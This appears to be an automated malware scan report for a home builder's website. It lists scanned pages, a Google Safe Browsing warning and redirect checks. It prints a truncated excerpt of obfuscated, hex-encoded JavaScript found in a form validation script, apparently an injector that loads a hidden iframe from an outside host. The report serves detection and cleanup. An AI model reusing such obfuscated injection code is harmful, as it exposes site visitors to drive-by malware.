Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=castleheadhomes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.castleheadhomes.com/ | 200 OK Content-Length: 5652 Content-Type: text/html | clean |
http://www.castleheadhomes.com/index.asp | 200 OK Content-Length: 5652 Content-Type: text/html | clean |
http://www.castleheadhomes.com/developments.asp | 200 OK Content-Length: 6504 Content-Type: text/html | clean |
http://www.castleheadhomes.com/aboutus.asp | 200 OK Content-Length: 6478 Content-Type: text/html | clean |
http://www.castleheadhomes.com/testimonials.asp | 200 OK Content-Length: 6326 Content-Type: text/html | clean |
http://www.castleheadhomes.com/cobourg.asp | 200 OK Content-Length: 8455 Content-Type: text/html | clean |
http://www.castleheadhomes.com/contact.asp | 200 OK Content-Length: 9255 Content-Type: text/html | clean |
http://www.castleheadhomes.com/scripts/form_validation_v1.js | 200 OK Content-Length: 9757 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,69,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,69,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,69,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,77,68,79,6c,6b,6c,7a,77,76,7a,70,7b,70,7d,68,7a,35,6a,76,74,36,7e, Antivirus reports:
| ||
http://www.castleheadhomes.com/map.asp | 200 OK Content-Length: 7284 Content-Type: text/html | clean |
http://www.castleheadhomes.com/dev_newamherst.asp | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 18 Dec 2014 22:40:13 GMT Content-Type: text/html Set-Cookie: ASPSESSIONIDQCCDACSQ=PBNFOLKBDHNAMLGGGIIOMMCI; path=/ Set-Cookie: TS0194eee0=01e93bdf0fd967090c211431111119a40bdff8df9580b04f707642ff2d992d8831c50733b8f09f4320a523170f60cd81dec779a3bc; Path=/ X-Powered-By: ASP.NET | clean |
http://www.castleheadhomes.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.castleheadhomes.com/dev_dunbargardens.asp | 200 OK Content-Length: 6035 Content-Type: text/html | clean |
http://www.castleheadhomes.com/dev_dg_turnberryb.asp | 200 OK Content-Length: 7004 Content-Type: text/html | clean |
http://www.castleheadhomes.com/brochures/turnberryb.pdf | 200 OK Content-Length: 300288 Content-Type: application/pdf | clean |
http://www.castleheadhomes.com/dev_dg_turnberryc.asp | 200 OK Content-Length: 7004 Content-Type: text/html | clean |
http://www.castleheadhomes.com/brochures/turnberryc.pdf | 200 OK Content-Length: 300992 Content-Type: application/pdf | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: castleheadhomes.com
Result:
GET / HTTP/1.1
Host: castleheadhomes.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: castleheadhomes.com
Referer: http://www.google.com/search?q=castleheadhomes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: castleheadhomes.com
Referer: http://www.google.com/search?q=castleheadhomes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.